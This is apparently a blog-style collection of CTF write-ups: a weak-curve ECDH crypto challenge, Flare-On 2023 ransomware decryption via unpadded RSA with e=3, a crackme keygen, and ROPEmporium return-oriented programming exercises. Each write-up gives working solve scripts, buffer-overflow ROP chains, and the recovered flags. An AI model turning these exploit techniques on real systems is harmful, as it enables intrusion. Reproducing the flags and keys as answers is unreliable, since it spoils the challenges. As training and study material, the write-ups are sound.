We are given the following code that encrypts the flag:
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from Crypto.Util.number import long_to_bytes
from hashlib import sha256
from secret import FLAG, p, b, priv_a, priv_b
F = GF(p)
E = EllipticCurve(F, [726, b])
G = E(926644437000604217447316655857202297402572559368538978912888106419470011487878351667380679323664062362524967242819810112524880301882054682462685841995367, 4856802955780604241403155772782614224057462426619061437325274365157616489963087648882578621484232159439344263863246191729458550632500259702851115715803253)
A = G * priv_a
B = G * priv_b
print(A)
print(B)
C = priv_a * B
assert C == priv_b * A
# now use it as shared secret
secret = C[0]
hash = sha256()
hash.update(long_to_bytes(secret))
key = hash.digest()[16:32]
iv = b'u\x8fo\x9aK\xc5\x17\xa7>[\x18\xa3\xc5\x11\x9en'
cipher = AES.new(key, AES.MODE_CBC, iv)
encrypted = cipher.encrypt(pad(FLAG, 16))
print(encrypted)
This code generates the elliptic curve given by the equation y**2 = x**3 + 726x + b
over a finite field of order p
. A generator point G
is given, along with two private keys priv_a
and priv_b
, which are used to generate a shared secret using elliptic curve Diffie-Hellman. (If you’re not familiar with this algorithm, here’s my writeup on the basics of how it works.) The shared secret is then used to derive an AES key that encrypts the flag.
We are given the public keys A
and B
, but we do not know either of the private keys priv_a
or priv_b
, so we are unable to derive the shared secret. Our goal is to exploit a weakness in the encryption algorithm to calculate priv_a
or priv_b
.
The interesting thing about this challenge is that the parameters p
and b
are hidden from us. In order for the ECDH algorithm to work, both parties must know the order p
of the finite field and the equation of the curve. In general, the value of p
, the parameters of the curve, and the generator G
are chosen from one of a set of standard curves that are known to be secure. For example, the curve secp256k1
is specified by the following parameters:
y**2 = x**3 + 7
p = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2f
G = (0x79be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798,
0x483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8)
The generator point G
that we are given is not equal to the standard generator point of any commonly used curves, so chances are, we’re dealing with a nonstandard curve that was designed specifically for this challenge - probably because it’s insecure in some way. Since it’s not a standard curve, we’ll have to determine p
and b
solely based on the information given to us in the challenge, so let’s look at what we know.
The x- and y-coordinates of G
are 509 and 511 bits respectively, suggesting that p
is probably a 512-bit prime. In addition, we’re given three different points on the curve: G
, A
, and B
. Each of those points (x,y)
will need to satisfy y**2 = x**3 + 726x + b (mod p)
.
Let’s call the three sets of points (x_A, y_A)
, (x_B, y_B)
, and (x_G, y_G)
. We can calculate three values b_A
, b_B
, and b_G
using the equation of the curve: b = y**2 - x**3 - 726x
. This will get us three different values: the curve is defined over GF(p)
not over the integers, so b_A
, b_B
, and b_G
won’t necessarily be equal - but they will be congruent mod p
, whatever p
is.
This gives us enough information to guess a value of p
. Since b_A
, b_B
, and b_G
are all congruent mod p
, their differences b_A - b_B
, b_G - b_B
, and b_A - b_G
are all equal to 0 mod p
, i.e., they are all divisible by p. Knowing that, we can look at the common divisors of b_A - b_B
, b_G - b_B
, and b_A - b_G
. If one of those common divisors is a 512-bit prime, that’s almost certainly the value of p
.
The following script calculates the greatest common divisor of b_A - b_B
, b_G - b_B
, and b_A - b_G
:
def get_b(xy):
x = xy[0]
y = xy[1]
return y**2 - (x**3 + 726*x)
def guess_p(G_xy, A_xy, B_xy):
b_G = get_b(G_xy)
b_A = get_b(A_xy)
b_B = get_b(B_xy)
return gcd(b_G - b_A, gcd(b_B - b_A, b_G - b_B))
G_xy = (926644437000604217447316655857202297402572559368538978912888106419470011487878351667380679323664062362524967242819810112524880301882054682462685841995367, 4856802955780604241403155772782614224057462426619061437325274365157616489963087648882578621484232159439344263863246191729458550632500259702851115715803253)
A_xy = (6174416269259286934151093673164493189253884617479643341333149124572806980379124586263533252636111274525178176274923169261099721987218035121599399265706997, 2456156841357590320251214761807569562271603953403894230401577941817844043774935363309919542532110972731996540328492565967313383895865130190496346350907696)
B_xy = (4226762176873291628054959228555764767094892520498623417484902164747532571129516149589498324130156426781285021938363575037142149243496535991590582169062734, 425803237362195796450773819823046131597391930883675502922975433050925120921590881749610863732987162129269250945941632435026800264517318677407220354869865)
p = guess_p(G_xy, A_xy, B_xy)
print(p)
This prints out the value 6811640204116707417092117962115673978365477767365408659433165386030330695774965849821512765233994033921595018695941912899856987893397852151975650548637533
, which is in fact a 512-bit prime. That means we’re on the right track!
Now that we know the full equation of the curve, we can find the order of the generator point G
: the number of distinct points on the curve that can be obtained by repeatedly adding G
to itself. Sage has a built-in function G.order()
to do this. Since every point used in the ECDH algorithm is a multiple of G
, this gives us a measure of how feasible it would be to bruteforce the value of one of the private keys.
For this curve, it turns out that the order of G
is only 11, so guessing a private key is easy. To calculate priv_a
, we just need to calculate kG
for values of k
in the range 0 through 10, then compare the result to the public key point A
. The value of k
that produces a matching point is priv_a
. From there, we just need to calculate the shared secret, which is equal to priv_a * B
, to decrypt the flag.
Final solve script:
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from Crypto.Util.number import long_to_bytes
from hashlib import sha256
def get_b(xy):
x = xy[0]
y = xy[1]
return y**2 - (x**3 + 726*x)
def guess_p(G_xy, A_xy, B_xy):
b_G = get_b(G_xy)
b_A = get_b(A_xy)
b_B = get_b(B_xy)
return gcd(b_G - b_A, gcd(b_B - b_A, b_G - b_B))
G_xy = (926644437000604217447316655857202297402572559368538978912888106419470011487878351667380679323664062362524967242819810112524880301882054682462685841995367, 4856802955780604241403155772782614224057462426619061437325274365157616489963087648882578621484232159439344263863246191729458550632500259702851115715803253)
A_xy = (6174416269259286934151093673164493189253884617479643341333149124572806980379124586263533252636111274525178176274923169261099721987218035121599399265706997, 2456156841357590320251214761807569562271603953403894230401577941817844043774935363309919542532110972731996540328492565967313383895865130190496346350907696)
B_xy = (4226762176873291628054959228555764767094892520498623417484902164747532571129516149589498324130156426781285021938363575037142149243496535991590582169062734, 425803237362195796450773819823046131597391930883675502922975433050925120921590881749610863732987162129269250945941632435026800264517318677407220354869865)
p = guess_p(G_xy, A_xy, B_xy)
b = get_b(G_xy) % p
F = GF(p)
E = EllipticCurve(F, [726, b % p])
G = E(G_xy[0], G_xy[1])
A = E(A_xy[0], A_xy[1])
B = E(B_xy[0], B_xy[1])
print("Order of G:", G.order())
for i in range(11):
P = i * G
if(P == A):
priv_a = i
break
print(priv_a)
C = priv_a * B
secret = C[0]
hash = sha256()
hash.update(long_to_bytes(int(secret)))
ciphertext = b'V\x1b\xc6&\x04Z\xb0c\xec\x1a\tn\xd9\xa6(\xc1\xe1\xc5I\xf5\x1c\xd3\xa7\xdd\xa0\x84j\x9bob\x9d"\xd8\xf7\x98?^\x9dA{\xde\x08\x8f\x84i\xbf\x1f\xab'
key = hash.digest()[16:32]
iv = b'u\x8fo\x9aK\xc5\x17\xa7>[\x18\xa3\xc5\x11\x9en'
cipher = AES.new(key, AES.MODE_CBC, iv)
flag = cipher.decrypt(ciphertext)
print(flag)
This gets us the flag: HTB{0rD3r_mUsT_b3_prEs3RveD_!!@!}
I found challenge 11 to be one of the more interesting challenges, as it required a more in-depth understanding of cryptography than last year’s ransomware challenge.
We are given two files: the challenge binary FLAREON_2023.exe
, as well as a file very_important_file.d3crypt_m3
. This immediately tells us that we’re likely dealing with a ransomware sample, and that we’ll have to reverse the encryption algorithm in order to recover the file.
Running the binary without any arguments didn’t do anything, so the first step was to figure out the expected argument format. Looking through the strings, I found the string .3ncrypt_m3
, suggesting that the program would only encrypt files with this extension. Presumably this is intended as a safeguard to ensure that people don’t accidentally encrypt their entire filesystem. After some experimenting, I found that the program took a directory as an argument, and it would then encrypt any .3ncrypt_m3
files in that directory.
After figuring out the argument format, the next thing I tried was to encrypt a test file. We can create a test file consisting of 0x1000 zero bytes with the command fsutil file createNew zeroes.3ncrypt_m3 0x1000
.
After encryption, the size of the file was 0x1100 bytes. This suggested to me that the original 0x1000 bytes of the file had been encrypted with a symmetric encryption algorithm, and that the symmetric key had been encrypted with RSA and appended to the end of the file. This is about what I was expecting, as most real ransomware performs its encryption this way.
I noticed that the string expand 32-byte k
appeared in the binary, which is a constant that is used in the Salsa20 and ChaCha20 encryption algorithms. This string is accessed in the function sub_14007ee60
, and the string d3crypt_m3
is accessed in the same function. This indicated to me that sub_14007ee60
was the function where the actual encryption took place.
It looked like two different random keys were being generated. The first key was 0x30 bytes, and it was concatenated to the expand 32-byte k
string to form the ChaCha20 matrix. The second key was 0x18 bytes, and it was XORed with the ciphertext after the ChaCha20 encryption was performed. Both keys were then concatenated together and RSA encrypted.
Looking at how the key was generated, I found that a new key was generated for each encrypted file. The function that generated the key bytes contained the string crypto\rand\rand_lib.c
, which told me that OpenSSL’s random number generation was being used. This function uses BCryptGenRandom
internally and it is cryptographically secure. This effectively rules out the possibility that we’ll be able to break the encryption by guessing the key, so to break the encryption we’ll need to focus on the RSA.
The RSA encryption function is located at sub_1400987b0
. The strings in this function helpfully tell us that the source file is located at crypto/rsa/rsa_ossl.c
.
Comparing this source file to the decompiled code, we can see that the encryption function is rsa_ossl_public_encrypt, and that its arguments and return value are given by static int rsa_ossl_public_encrypt(int flen, const unsigned char *from, unsigned char *to, RSA *rsa, int padding)
.
The struct RSA
ia defined in crypto/rsa/rsa_local.h, and among other things it contains the value of the modulus N
and the public exponent e
. Setting a breakpoint at the RSA function in the debugger, we find
N = 0xc9c330728f68087afc60a133e49b9d3de49f0ff9995c5e12e5c65c11897bc718e3e4d272d5a58ce463755b2c63467f0d09f93c31cb67fe318809af7fc8b2c8c721ab547ce4db63dbdfff5d9b06c85799fdee690f90c479c6d0b9e3a3f66e55d63029ce5a02ef84c6aadc5e2241683024cc65d75642afe0babe76f29a677ceb159be48bb3265ebd2bd519a2af7e036cc2e6401c37555761a81c3d1d28a456c38b91b559035bff013dda0439053b9e96f4b278f719e939e677d058bc6e98005aff230814a497ab34b7fa902b666d180de84e24e90f753d79db0b7217acb5c46f4d1aa56bee573f2d47a4337ddd1e2b967edc7038feeb090dec7492d94d9689bb61
e = 3
We can also see that the padding
argument is equal to 3, which corresponds to the constant RSA_NO_PADDING
.
For a modulus N
, public exponent e
, and message m
, the ciphertext c
is given by the equation c = m**e % N
. The security of RSA relies on this equation being difficult to solve for m
, but there’s one case where it’s easy: if m**e
is less than N
, we can find m
by taking the e
th root of c
. If the public exponent used is large and if short messages are padded using a secure padding algorithm, this never happens, but this challenge uses a public exponent of 3 and uses no padding.
At 0x58 bytes, the message isn’t quite short enough to be recovered simply by taking the cube root of the ciphertext, but we can use a similar strategy. We know the last 0x10 bytes of the plaintext are expand 32-byte k
. If we let m
refer to just the unknown part of the message, tnd we let x
refer to the known bytes expand 32-byte k
, then the equation for the ciphertext is given by (2**16 * m + x)**3 = c
. Expanding this equation out, we obtain a cubic which can be solved exactly for m
, as shown in the following script using Sympy:
import sympy
from sympy.abc import m
N = 0xc9c330728f68087afc60a133e49b9d3de49f0ff9995c5e12e5c65c11897bc718e3e4d272d5a58ce463755b2c63467f0d09f93c31cb67fe318809af7fc8b2c8c721ab547ce4db63dbdfff5d9b06c85799fdee690f90c479c6d0b9e3a3f66e55d63029ce5a02ef84c6aadc5e2241683024cc65d75642afe0babe76f29a677ceb159be48bb3265ebd2bd519a2af7e036cc2e6401c37555761a81c3d1d28a456c38b91b559035bff013dda0439053b9e96f4b278f719e939e677d058bc6e98005aff230814a497ab34b7fa902b666d180de84e24e90f753d79db0b7217acb5c46f4d1aa56bee573f2d47a4337ddd1e2b967edc7038feeb090dec7492d94d9689bb61
c = 0x1336e28042804094b2bf03051257aaaaba7eba3e3dd6facff7e3abdd571e9d2e2d2c84f512c0143b27207a3eac0ef965a23f4f4864c7a1ceb913ce1803dba02feb1b56cd8ebe16656abab222e8edca8e9c0dda17c370fce72fe7f6909eed1e6b02e92ebf720ba6051fd7f669cf309ba5467c1fb5d7bb2b7aeca07f11a575746c1047ea35cc3ce246ac0861f0778880d18b71fb2a8d7a736a646cf99b3dcec362d413414beb9f01815db7f72f6e081aee91f191572a28b9576f6c532349f8235b6daf31b39b5add7ade0cfbd30f704eb83d983c215de3261f73565843539f6bb46c9457df16e807449f99f3dabdddd5764fd63d09bc9c4e6844ec3410dc821ab4
x = int.from_bytes(b'expand 32-byte k','big')
cubic = sympy.Eq((2**256 * m**3) + (3 * (2**128) * m**2 * x) + (3 * m * x**2) , ((c - x**3) * pow(2**128, -1, N))%N)
print(sympy.solve(cubic))
As expected, this gives us an integer solution: 0x06f7768ff2b963f356fc25b3443f7b729f68bcbdd65f22de685c3cb5c8a2697224368530e264fd388dc962f5d737cb873e24f39709d294224a5268c3512ddb6b3e54419b41c810cf
.
The first 0x18 bytes of this integer correspond to the XOR key, and the remaining 0x30 are the unknown bytes of the ChaCha20 matrix. Since the XOR and ChaCha20 steps of the encryption are symmetric, we don’t have to reimplement them: we can just rename very_important_file.d3crypt_m3
to very_important_file.3ncrypt_m3
, then set a breakpoint after the random bytes are generated and replace them with the ones we decrypted.
This gets us the flag: Wa5nt_th1s_Supp0s3d_t0_b3_4_r3vers1nG_ch4l1eng3@flare-on.com
We are asked to enter a key, and the program checks to verify that the key is valid. There are many different valid keys for this challenge, so our goal is to not only find a single key, but to reverse engineer and replicate the validation algorithm.
You can find the challenge on GitHub here, or on crackmes.one here.
Looking at the disassembled code, we can immediately see sequences of instructions that don’t make sense. In this screenshot, all disassembly after the call
instruction is incorrect. However, the function call shown here never returns, so the program never encounters the incorrect instructions.
There is another function with an entry point at 4011b1
, but the disassembler fails to recognize it, as it has started disassembling a cmovs
instruction at 4011b0
. If we instead tell the disassembler to start at address 4011b1
, we get a much more reasonable result:
This anti-disassembly makes it nearly impossible to trace the control flow through static analysis. For the most part, I reconstructed the original control flow by stepping through the code in a debugger one instruction at a time.
We can immediately see a few basic checks being made. The first check verifies that the length of our key is 0x13:
Subsequently, several characters are compared to the character -
. This tells us that the key consists of 4 groups of 4 characters each, separated by dashes.
I found that the first 8 characters were being compared to the characters in a long string. Initially, I thought that the key had to match the first 8 characters of this string, but on closer inspection I found that the program would accept any set of 8 characters that consisted only of letters appearing in the first half of the string (OFCKANLUPEQDHXTYWBMI
).
The set of 8 characters that we choose from the first half of the string are used as the input for a validation function that determines the second 8 characters of our key. The second 8 characters are uniquely determined by this validation function: the program generates the remaining part of the key, then compares the rest of our input to it.
Technically, this is already enough to obtain a valid key. Since the program generates the entire key before comparing it to the input, we can just set a breakpoint in the debugger after the key is generated and read it from memory. This is how I approached the challenge initially, but then I went back and reverse engineered the validation function.
The first thing the program does after checking the first 8 characters is to generate another 8-character string using values from the second half of the long string in the program’s memory. It turns out that long string is actually two separate lookup tables: the program finds the indices of the first 8 key characters in the first lookup table, then chooses the corresponding characters from the second lookup table.
For example, if we entered a key that began with OFCK-ANLU
, the program would generate the string mqXagNiZ
.
table1 = 'OFCKANLUPEQDHXTYWBMI'
table2 = 'mqXagNiZJWlEFSydocHP%#"'
def get_indices(key):
res = ''
for c in key: res += table2[table1.index(c)]
return res
The newly generated string then has a series of transformations applied to it. Tracing through the program’s execution, I found that the string was being passed to a function that referenced the values 0xcbf29ce484222325
and 0x100000001b3
. On closer inspection, I found that these values were actually constants hard-coded into the binary:
I Googled these values and found that they were used as the initial state of the FNV-1 hash function. Checking the output of the function in the binary, I verified that it was consistent with the FNV-1 hash of the string.
def fnv1_64(data):
state = 0xcbf29ce484222325
prime = 0x100000001b3
for i in data:
state = (state * prime) % 2**64
state ^= i
return state
This hash was then passed into a variation of the xorshift PRNG algorithm.
Fortunately, this was one of the few functions that actually had reasonable-looking decompilation, so it was pretty straightforward to replicate:
def xorshift(state):
mask = 0xffffffffffffffff
state ^= ((state << 0xd) & mask)
state ^= ((state >> 0x7) & mask)
state ^= ((state << 0x11) & mask)
return (state & mask)
The xorshift function was called 256 times, and the least significant byte was saved each time, leaving us with an array of 256 pseudorandom bytes.
I then found that a second 256-byte array was being generated. The obfuscated disassembly was particularly confusing in this stage, so rather than attempt to follow the control flow, I just stepped through the code and observed wnat was happening in memory.
I found that an array was being initialized with the values 0 to 255. The values in the array were then replaced with different values in order, one byte at a time.
This was already enough to suggest to me that RC4 was being used. On closer inspection, I found that the first 256-byte array was being used as a key to derive the second array using RC4.
Once the RC4 key is initialized, the program returns to the initial string that was used as input to the FNV-1 hash and encrypts it. At that point, the program returns to the xorshift function and generates more pseudorandom numbers, which are used to choose random indices into the RC4-encrypted string. Repeated indices are discarded, and the program continues to call the xorshift function until 4 distinct indices are produced:
indices = []
while len(indices) < 4:
res = xorshift(res)
if ct[res % 8] not in indices: indices.append(ct[res % 8])
The 4 resulting bytes are then used to index into the first 16 characters of the long string (OFCKANLUPEQDHXTY
), creating a new string of 8 capital letters.
second_key = ''
short_table1 = table1[0:0x10]
for i in indices:
second_key += short_table1[i % 0x10]
second_key += short_table1[(i // 0x10) % 0x10]
These 8 capital letters are expected to be the second 8 characters of our original input. If the input does not match these 8 characters, then our key is invalid.
Putting all of this together, we finally have a keygen script:
from Crypto.Cipher import ARC4
table1 = 'OFCKANLUPEQDHXTYWBMI'
table2 = 'mqXagNiZJWlEFSydocHP%#"'
def get_indices(key):
res = ''
for c in key: res += table2[table1.index(c)]
return res
def fnv1_64(data):
state = 0xcbf29ce484222325
prime = 0x100000001b3
for i in data:
state = (state * prime) % 2**64
state ^= i
return state
def xorshift(state):
mask = 0xffffffffffffffff
state ^= ((state << 0xd) & mask)
state ^= ((state >> 0x7) & mask)
state ^= ((state << 0x11) & mask)
return (state & mask)
first_key = input(f"Enter any 8 characters from the following table: {table1}\n")
table2_key = get_indices(first_key).encode('utf-8')
res = fnv1_64(table2_key)
n = 256
lsb_arr = b''
for i in range(n):
res = xorshift(res)
lsb_arr += (res & 0xff).to_bytes(1, 'little')
cipher = ARC4.new(lsb_arr)
ct = cipher.encrypt(table2_key)
indices = []
while len(indices) < 4:
res = xorshift(res)
if ct[res % 8] not in indices: indices.append(ct[res % 8])
second_key = ''
short_table1 = table1[0:0x10]
for i in indices:
second_key += short_table1[i % 0x10]
second_key += short_table1[(i // 0x10) % 0x10]
final_key = f"{first_key[0:4]}-{first_key[4:8]}-{second_key[0:4]}-{second_key[4:8]}"
print(f"Generated key {final_key}")
ROPEmporium is a series of eight challenges designed to teach the basics of return-oriented programming. The challenge binaries are available in several different architectures, but this writeup will look only at the x86_64 version.
The challenge binaries and instructions are available here.
In order to read the flag, we need to call the function ret2win
:
Fortunately, we are provided with a vulnerable function. This function allows us to read 0x38 bytes into a buffer of size 0x20, allowing us to overflow the buffer and overwrite the return address.
We can write 40 bytes to fill the buffer, then overwrite the return address with the address of ret2win
.
from pwn import *
chal = process("./ret2win")
send_str = b'a'*40 + p64(0x40075a)
print(chal.recvuntil(b'>'))
chal.sendline(send_str)
print(chal.recvall())
For this challenge, we will need to do more than just call a single function. We are provided with the command string to open the flag file, but it is not used as an argument to system()
.
We are also provided with a call to system("/bin/ls")
.
The solution is to load the address of the necessary string into rdi
, then return to the call to system()
. To do this, we need the gadget pop rdi; ret
, which we can find at address 0x4007c3
.
from pwn import *
pop_rdi = 0x4007c3
string_addr = 0x601060
system_addr = 0x40074b
chal = process("./split")
send_str = b'a'*40 + p64(pop_rdi) + p64(string_addr) + p64(system_addr)
print(chal.recvuntil(b'>'))
chal.sendline(send_str)
print(chal.recvall())
This challenge tells us that we must call three functions called callme_one
, callme_two
, and callme_three
with arguments 0xdeadbeefdeadbeef
, 0xcafebabecafebabe
, and 0xd00df00dd00df00d
.
The callme
functions are located in the external library libcallme.so
. We can find calls to each of the callme
functions in the .plt
section. To call the functions, we must find a way to load the correct arguments into rsi
, rdi
, and rax
, then return to the address in the .plt
section where they are called.
To make things easier for us, the challenge provides us with “useful gadgets” that load in the correct arguments. We must return to this gadget before each function call.
Here is a first attempt at a script:
from pwn import *
arg1 = 0xdeadbeefdeadbeef
arg2 = 0xcafebabecafebabe
arg3 = 0xd00df00dd00df00d
one_addr = 0x400720
two_addr = 0x400740
three_addr = 0x4006f0
gadget = 0x40093c
call_args = p64(gadget) + p64(arg1) + p64(arg2) + p64(arg3)
chal = process('./callme')
send_str = b'a'*40 + call_args + p64(one_addr) + call_args + p64(two_addr) + call_args + p64(three_addr)
f = open('fake_stdin','wb')
f.write(send_str)
f.close()
print(chal.recvuntil(b'>'))
chal.sendline(send_str)
print(chal.recvall())
This script seems like it should work, but it segfaults. What has gone wrong? Looking at the segfault in gdb, it appears that callme_one
was called with the correct arguments, but the segfault has occurred at a seemingly random point in fclose()
.
This left me confused for a while, but it turns out that ROPEmporium has a “common pitfalls” section warning us of this exact problem:
If you’re segfaulting on a
movaps
instruction inbuffered_vfprintf()
ordo_system()
in the x86_64 challenges, then ensure the stack is 16-byte aligned before returning to GLIBC functions such asprintf()
orsystem()
. Some versions of GLIBC uses movaps instructions to move data onto the stack in certain functions. The 64 bit calling convention requires the stack to be 16-byte aligned before a call instruction but this is easily violated during ROP chain execution, causing all further calls from that function to be made with a misaligned stack.movaps
triggers a general protection fault when operating on unaligned data, so try padding your ROP chain with an extra ret before returning into a function or return further into a function to skip a push instruction.
Sure enough, our segfault happens on a movaps
instruction. All we need to do to fix the issue is add an extra ret
instruction to the start of the chain.
Here is our final script with the extra ret
added:
from pwn import *
arg1 = 0xdeadbeefdeadbeef
arg2 = 0xcafebabecafebabe
arg3 = 0xd00df00dd00df00d
one_addr = 0x400720
two_addr = 0x400740
three_addr = 0x4006f0
gadget = 0x40093c
ret = 0x4006be
call_args = p64(gadget) + p64(arg1) + p64(arg2) + p64(arg3)
chal = process('./callme')
send_str = b'a'*40 + p64(ret) + call_args + p64(one_addr) + call_args + p64(two_addr) + call_args + p64(three_addr)
print(chal.recvuntil(b'>'))
chal.sendline(send_str)
print(chal.recvall())
For this challenge, we are given a function called print_file()
that we must call with the argument flag.txt
, but this string is not present in the executable. We will need to figure out how to write the string ourselves.
The “useful gadget” provided to us this time around is mov [r14], r15; ret
. If we can load an address we want to write to into r14
and the string flag.txt
into r15
, then we can write flag.txt
to memory. This will allow us to pass its address to print_file()
as an argument.
flag.txt
is exactly 8 bytes long, so it fits into a register. Using the gadget pop r14; pop r15; ret
, we can pop an address in the .data
section into r14
and flag.txt
into r15. I chose the start of the .data
section as the address to use for this - it is not used by any other part of the program, and it is all zeroes, meaning that we do not have to worry about null terminating the string. We can then add mov [r14], r15; ret
as the next part of the chain, allowing us to write the string to memory.
At that point, we can pass the address of flag.txt
as an argument to print_file()
via rdi
, as we did with the previous challenges.
Final solve script:
from pwn import *
pop_r14_r15 = 0x400690 # pop r14; pop r15; ret
mov_r14 = 0x400628 # mov [r14], r15; ret
pop_rdi = 0x400693 # pop rdi; ret
data_addr = 0x601028 # start of .data section
print_file = 0x400620 # call print_file
chal = process("./write4")
send_str = b'a'*40 + p64(pop_r14_r15) + p64(data_addr) + b'flag.txt' + p64(mov_r14) + p64(pop_rdi) + p64(data_addr) + p64(print_file)
print(chal.recvuntil(b'>'))
chal.sendline(send_str)
print(chal.recvall())
This challenge is identical to the last one, except that we are prevented from using the characters x
, g
, a
, and .
. This means that we can no longer directly write flag.txt
to the buffer - we have to obfuscate it somehow.
The useful gadgets for this challenge give us a clue on how to do this. We are given the gadget xor byte ptr [r15], r14b ; ret
, so we can perform a single-byte XOR on an arbitrary value.
To avoid the bad characters, we can XOR each byte of the input string with 0xff, then create a chain that performs the XOR again to restore the original values. At first, I tried to construct the chain like this:
deobfuscate_flag = b''
for addr in range(data_addr, data_addr + 8):
deobfuscate_flag += p64(pop_r15) # pop r15; ret
deobfuscate_flag += p64(addr)
deobfuscate_flag += p64(xor_data) # xor byte ptr [r15], r14b ; ret
This almost worked, but there was a problem: the x
in flag.txt
was not being XORed. It turned out that this had to do with where the data was being written - my chosen address for the obfuscated flag.txt
was 0x601028
, and the x
was located at 0x60102e
. But 0x2e is .
, which is one of the forbidden characters! We can deal with the issue by using the start address 0x601038
instead.
For the final script, we need to write the obfuscated flag.txt
to memory, XOR each byte with 0xff to restore it, then pass it as an argument to print_file()
.
from pwn import *
pop_r12 = 0x40069c # pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
mov_r13 = 0x400634 # mov qword ptr [r13], r12 ; ret
pop_r15 = 0x4006a2 # pop r15; ret
xor_data = 0x400628 # xor byte ptr [r15], r14b ; ret
pop_rdi = 0x4006a3 # pop rdi; ret
data_addr = 0x601030 # start of .data section
print_file = 0x400620 # call print_file
xor_flag_txt = xor(b'flag.txt', b'\xff')
chal = process("./badchars")
deobfuscate_flag = b''
for addr in range(data_addr, data_addr + 8):
deobfuscate_flag += p64(pop_r15)
deobfuscate_flag += p64(addr)
deobfuscate_flag += p64(xor_data)
write_flag_txt = b'a'*40 + p64(pop_r12) + xor_flag_txt + p64(data_addr) + p64(0xff) + p64(data_addr) + p64(mov_r13)
call_print = p64(pop_rdi) + p64(data_addr) + p64(print_file)
send_str = write_flag_txt + deobfuscate_flag + call_print
f = open('fake_stdin','wb')
f.write(send_str)
f.close()
Up to this point, the challenge binaries have included “useful gadgets” that do exactly what we need, which isn’t very realistic. For this challenge, we are instead provided with a set of “questionable gadgets” that may be helpful, but we’ll have to be more creative in how we use them.
We need to find some way to write the flag.txt
string. There aren’t many gadgets that let us store data into memory, so we’ll have to work backwards from the few gadgets we have. The gadget add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
looks promising, since we also have pop rbp ; ret
. This means that we can choose an arbitrary address and add the value in ebx
to it. If we choose an address that we know will contain all zeroes, this is the same as writing the value in ebx
to the address.
This is where the “questionable gadgets” come in. If we pop the correct values into rcx
and rdx
, then the instruction bextr rbx, rcx, rdx
allows us to write to rbx
.
Felix Cloutier’s description of the bextr
instruction tells us that it does the following:
Extracts contiguous bits from the first source operand (the second operand) using an index value and length value specified in the second source operand (the third operand). Bit 7:0 of the second source operand specifies the starting bit position of bit extraction. A START value exceeding the operand size will not extract any bits from the second source operand. Bit 15:8 of the second source operand specifies the maximum number of bits (LENGTH) beginning at the START position to extract.
In our case, the destination register is rbx
. With the right choice of values in rcx
and rdx
, we can write an arbitrary value to rbx
. The first source operand (rcx
) should contain the value that we want to write to rbx
. The second source operand (rdx
) should contain the value 0 in bits 7:0 (to specify that we’re starting the extraction at position 0) and the value 64 in bits 15:8 (to specify that we want to extract all 64 bits).
Note that our gadget adds 0x3ef2
to rcx
before performing the bextr
operation. To correct for this, we can simply subtract 0x3ef2
from our desired value before passing it in.
We have now found a way to write to memory. We can use bextr
to write to rbx, then write that value to memory with the add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
gadget. From there, the solution proceeds in the same way as the write4
challenge.
Solve script:
from pwn import *
bextr_addr = 0x40062a
pop_rdi = 0x4006a3 # pop rdi ; ret
pop_rbp = 0x400588 # pop rbp ; ret
add_rbp = 0x4005e8 # add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
data_addr = 0x601028
print_file = 0x400620
def write_value(value, data_addr):
payload = p64(pop_rdi) + p64(data_addr)
payload += p64(bextr_addr) + p64(64 << 8) + p64(int.from_bytes(value, 'little') - 0x3ef2) # use bextr to get value into rbx
payload += p64(pop_rbp) + p64(data_addr + 0x3d)
payload += p64(add_rbp)
return payload
chal = process("./fluff")
send_str = b'a'*40
send_str += write_value(b'flag', data_addr)
send_str += write_value(b'.txt', data_addr+4) # we can only write 32 bits at a time, so we need 2 writes
send_str += p64(pop_rdi) + p64(data_addr) + p64(print_file)
print(chal.recvuntil(b'>'))
chal.sendline(send_str)
print(chal.recvall())
In this challenge, we need to call a library function that is not imported. The ret2win
function is located in libpivot.so
at offset 0xa81
:
ret2win
is not imported, but another function called foothold_function
is. Its offset is 0x96a
:
We do not know where ret2win
will be loaded into memory, but we know that its offset is 0xa81 - 0x96a = 0x117
from foothold_function
.
In addition, the pwnme
function is different from the previous challenge. We are given a very limited amount of space on the stack for our chain, but we have a separate write to 0x100 bytes of memory on the heap. Normally, we would likely have to find some way to leak the address of this heap memory, but in this case the challenge helpfully prints it out.
The chain at the pivot address will contain most of what we need to do. The buffer overflow on the stack will only be used to overwrite the original stack pointer with the address of the pivot.
The “useful gadgets” allow us to do exactly that: we can pop the location of the pivot into rax
, then exchange the value of rax
with that of rsp
. With the pivot address in rsp
, we can continue the chain from there.
We now need to call ret2win
. Since we know the offset of ret2win
relative to foothold_function
, we will start by calling foothold_function
in order to resolve its .got.plt
entry. We first pop the pointer to the .got.plt
entry into rax
, then use the gadget mov rax, qword ptr [rax] ; ret
to get the value at that entry.
We can then add the offset to the address of foothold_function
in order to obtain the address of ret2win
. We can pop the offset into rbp
and use the gadget add rax, rbp ; ret
to add them. The last part of the chain is jmp rax
, which takes us to ret2win
.
Final script:
from pwn import *
chal = process("./pivot")
# write to pivot address
foothold_call = 0x400720
pop_rbp = 0x4007c8 # pop rbp ; ret
pop_rax = 0x4009bb # pop rax; ret
jmp_rax = 0x4007c1 # jmp rax
read_rax_addr = 0x4009c0 # mov rax, qword ptr [rax] ; ret
add_rax_rbp = 0x4009c4 # add rax, rbp ; ret
foothold_ptr = 0x601040
offset = 0xa81 - 0x96a
pivot_chain = b''
pivot_chain += p64(foothold_call)
pivot_chain += p64(pop_rbp) + p64(offset)
pivot_chain += p64(pop_rax) + p64(foothold_ptr)
pivot_chain += p64(read_rax_addr)
pivot_chain += p64(add_rax_rbp)
pivot_chain += p64(jmp_rax)
chal.recvuntil(b'pivot: ')
pivot_addr = int(chal.recv(numb=14), 16)
chal.recvuntil(b'>')
chal.sendline(pivot_chain)
# write to stack
xchg_rsp = 0x4009bd # xchg rsp, rax ; ret
stack_chain = b'a'*40 + p64(pop_rax) + p64(pivot_addr) + p64(xchg_rsp)
chal.recvuntil(b'>')
chal.sendline(stack_chain)
print(chal.recvall())
